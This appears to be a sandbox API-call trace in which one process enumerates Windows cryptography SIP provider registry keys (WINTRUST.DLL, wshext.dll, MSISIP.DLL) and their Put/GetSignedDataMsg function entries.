| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x000001a8 Data => M\x00s\x00i\x00S\x00I\x00P\x00P\x00u\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 1 Handle => 0x000001a4 Name => {06C9E010-38CE-11D4-A2A3-00104BD35090} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {06C9E010-38CE-11D4-A2A3-00104BD35090} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 62 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x000001a8 Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00w\x00s\x00h\x00e\x00x\x00t\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x000001a8 Data => P\x00u\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 2 Handle => 0x000001a4 Name => {1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 62 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x000001a8 Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00w\x00s\x00h\x00e\x00x\x00t\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x000001a8 Data => P\x00u\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 3 Handle => 0x000001a4 Name => {1A610570-38CE-11D4-A2A3-00104BD35090} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {1A610570-38CE-11D4-A2A3-00104BD35090} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 62 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x000001a8 Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00w\x00s\x00h\x00e\x00x\x00t\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x000001a8 Data => P\x00u\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 4 Handle => 0x000001a4 Name => {9BA61D3F-E73A-11D0-8CD2-00C04FC295EE} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {9BA61D3F-E73A-11D0-8CD2-00C04FC295EE} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 50 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x000001a8 Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x000001a8 Data => C\x00r\x00y\x00p\x00t\x00S\x00I\x00P\x00P\x00u\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 5 Handle => 0x000001a4 Name => {C689AAB8-8E78-11D0-8C47-00C04FC295EE} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {C689AAB8-8E78-11D0-8C47-00C04FC295EE} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 50 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x000001a8 Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x000001a8 Data => C\x00r\x00y\x00p\x00t\x00S\x00I\x00P\x00P\x00u\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 6 Handle => 0x000001a4 Name => {C689AAB9-8E78-11D0-8C47-00C04FC295EE} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {C689AAB9-8E78-11D0-8C47-00C04FC295EE} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 50 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x000001a8 Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x000001a8 Data => C\x00r\x00y\x00p\x00t\x00S\x00I\x00P\x00P\x00u\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 7 Handle => 0x000001a4 Name => {C689AABA-8E78-11D0-8C47-00C04FC295EE} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {C689AABA-8E78-11D0-8C47-00C04FC295EE} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 50 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x000001a8 Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x000001a8 Data => C\x00r\x00y\x00p\x00t\x00S\x00I\x00P\x00P\x00u\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 8 Handle => 0x000001a4 Name => {DE351A42-8E59-11D0-8C47-00C04FC295EE} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {DE351A42-8E59-11D0-8C47-00C04FC295EE} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 50 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x000001a8 Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x000001a8 Data => C\x00r\x00y\x00p\x00t\x00S\x00I\x00P\x00P\x00u\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 9 Handle => 0x000001a4 Name => {DE351A43-8E59-11D0-8C47-00C04FC295EE} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {DE351A43-8E59-11D0-8C47-00C04FC295EE} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 50 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x000001a8 Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x000001a8 Data => C\x00r\x00y\x00p\x00t\x00S\x00I\x00P\x00P\x00u\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 10 Handle => 0x000001a4 Name => {DE351A43-8E59-11D0-8C47-00C04FC295EE} Class => |
FAILURE | 0x00000103 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a4 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 1 Handle => 0x0000019c Name => EncodingType 1 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a0 Registry => 0x0000019c SubKey => EncodingType 1 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x00000000 Registry => 0x000001a0 SubKey => CryptSIPDllPutSignedDataMsg |
FAILURE | 0x00000002 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a0 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 2 Handle => 0x0000019c Name => EncodingType 1 Class => |
FAILURE | 0x00000103 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x0000019c |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => PutSignedDataMsg FunctionAddress => 0x7dfab182 ModuleHandle => 0x7dfa0000 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x0000019c Registry => 0x80000002 SubKey => Software\Microsoft\Cryptography\OID |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 0 Handle => 0x0000019c Name => EncodingType 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a0 Registry => 0x0000019c SubKey => EncodingType 0 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a4 Registry => 0x000001a0 SubKey => CryptSIPDllGetSignedDataMsg |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 0 Handle => 0x000001a4 Name => {000C10F1-0000-0000-C000-000000000046} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {000C10F1-0000-0000-C000-000000000046} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 46 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x000001a8 Data => M\x00S\x00I\x00S\x00I\x00P\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 1 Handle => 0x000001a8 Data => M\x00s\x00i\x00S\x00I\x00P\x00G\x00e\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey |
Handle => 0x000001a8 |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA |
Index => 1 Handle => 0x000001a4 Name => {06C9E010-38CE-11D4-A2A3-00104BD35090} Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA |
Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {06C9E010-38CE-11D4-A2A3-00104BD35090} |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW |
MaxClassLength => 0 MaxValueLength => 62 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW |
Index => 0 Handle => 0x000001a8 Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00w\x00s\x00h\x00e\x00x\x00t\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => Dll |
SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW | Index => 1 Handle => 0x000001a8 Data => G\x00e\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey | Handle => 0x000001a8 | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA | Index => 2 Handle => 0x000001a4 Name => {1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} Class => | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA | Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {1629F04E-2799-4DB5-8FE5-ACE10F17EBAB} | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW | MaxClassLength => 0 MaxValueLength => 62 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW | Index => 0 Handle => 0x000001a8 Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00w\x00s\x00h\x00e\x00x\x00t\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => Dll | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW | Index => 1 Handle => 0x000001a8 Data => G\x00e\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey | Handle => 0x000001a8 | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA | Index => 3 Handle => 0x000001a4 Name => {1A610570-38CE-11D4-A2A3-00104BD35090} Class => | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA | Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {1A610570-38CE-11D4-A2A3-00104BD35090} | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW | MaxClassLength => 0 MaxValueLength => 62 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW | Index => 0 Handle => 0x000001a8 Data => C\x00:\x00\\x00W\x00I\x00N\x00D\x00O\x00W\x00S\x00\\x00s\x00y\x00s\x00t\x00e\x00m\x003\x002\x00\\x00w\x00s\x00h\x00e\x00x\x00t\x00.\x00d\x00l\x00l\x00\x00\x00 ValueName => Dll | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW | Index => 1 Handle => 0x000001a8 Data => G\x00e\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey | Handle => 0x000001a8 | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA | Index => 4 Handle => 0x000001a4 Name => {9BA61D3F-E73A-11D0-8CD2-00C04FC295EE} Class => | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA | Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {9BA61D3F-E73A-11D0-8CD2-00C04FC295EE} | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW | MaxClassLength => 0 MaxValueLength => 50 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW | Index => 0 Handle => 0x000001a8 Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => Dll | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW | Index => 1 Handle => 0x000001a8 Data => C\x00r\x00y\x00p\x00t\x00S\x00I\x00P\x00G\x00e\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey | Handle => 0x000001a8 | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA | Index => 5 Handle => 0x000001a4 Name => {C689AAB8-8E78-11D0-8C47-00C04FC295EE} Class => | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA | Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {C689AAB8-8E78-11D0-8C47-00C04FC295EE} | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW | MaxClassLength => 0 MaxValueLength => 50 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW | Index => 0 Handle => 0x000001a8 Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => Dll | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW | Index => 1 Handle => 0x000001a8 Data => C\x00r\x00y\x00p\x00t\x00S\x00I\x00P\x00G\x00e\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey | Handle => 0x000001a8 | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA | Index => 6 Handle => 0x000001a4 Name => {C689AAB9-8E78-11D0-8C47-00C04FC295EE} Class => | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA | Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {C689AAB9-8E78-11D0-8C47-00C04FC295EE} | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW | MaxClassLength => 0 MaxValueLength => 50 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW | Index => 0 Handle => 0x000001a8 Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => Dll | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW | Index => 1 Handle => 0x000001a8 Data => C\x00r\x00y\x00p\x00t\x00S\x00I\x00P\x00G\x00e\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey | Handle => 0x000001a8 | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA | Index => 7 Handle => 0x000001a4 Name => {C689AABA-8E78-11D0-8C47-00C04FC295EE} Class => | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA | Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {C689AABA-8E78-11D0-8C47-00C04FC295EE} | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW | MaxClassLength => 0 MaxValueLength => 50 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW | Index => 0 Handle => 0x000001a8 Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => Dll | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW | Index => 1 Handle => 0x000001a8 Data => C\x00r\x00y\x00p\x00t\x00S\x00I\x00P\x00G\x00e\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegCloseKey | Handle => 0x000001a8 | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumKeyExA | Index => 8 Handle => 0x000001a4 Name => {DE351A42-8E59-11D0-8C47-00C04FC295EE} Class => | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegOpenKeyExA | Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {DE351A42-8E59-11D0-8C47-00C04FC295EE} | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegQueryInfoKeyW | MaxClassLength => 0 MaxValueLength => 50 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW | Index => 0 Handle => 0x000001a8 Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => Dll | SUCCESS | 0x00000000 | |
| 19:40:26,373 | 252 | RegEnumValueW | Index => 1 Handle => 0x000001a8 Data => C\x00r\x00y\x00p\x00t\x00S\x00I\x00P\x00G\x00e\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegCloseKey | Handle => 0x000001a8 | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegEnumKeyExA | Index => 9 Handle => 0x000001a4 Name => {DE351A43-8E59-11D0-8C47-00C04FC295EE} Class => | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegOpenKeyExA | Handle => 0x000001a8 Registry => 0x000001a4 SubKey => {DE351A43-8E59-11D0-8C47-00C04FC295EE} | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegQueryInfoKeyW | MaxClassLength => 0 MaxValueLength => 50 MaxValueNameLength => 8 ValueCount => 2 MaxSubKeyLength => 0 KeyHandle => 0x000001a8 SubKeyCount => 0 Class => | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegEnumValueW | Index => 0 Handle => 0x000001a8 Data => W\x00I\x00N\x00T\x00R\x00U\x00S\x00T\x00.\x00D\x00L\x00L\x00\x00\x00 ValueName => Dll | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegEnumValueW | Index => 1 Handle => 0x000001a8 Data => C\x00r\x00y\x00p\x00t\x00S\x00I\x00P\x00G\x00e\x00t\x00S\x00i\x00g\x00n\x00e\x00d\x00D\x00a\x00t\x00a\x00M\x00s\x00g\x00\x00\x00 ValueName => FuncName | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegCloseKey | Handle => 0x000001a8 | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegEnumKeyExA | Index => 10 Handle => 0x000001a4 Name => {DE351A43-8E59-11D0-8C47-00C04FC295EE} Class => | FAILURE | 0x00000103 | |
| 19:40:26,383 | 252 | RegCloseKey | Handle => 0x000001a4 | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegCloseKey | Handle => 0x000001a0 | SUCCESS | 0x00000000 | |
| 19:40:26,383 | 252 | RegEnumKeyExA | Index => 1 Handle => 0x0000019c Name => EncodingType 1 Class => | SUCCESS | 0x00000000 | |
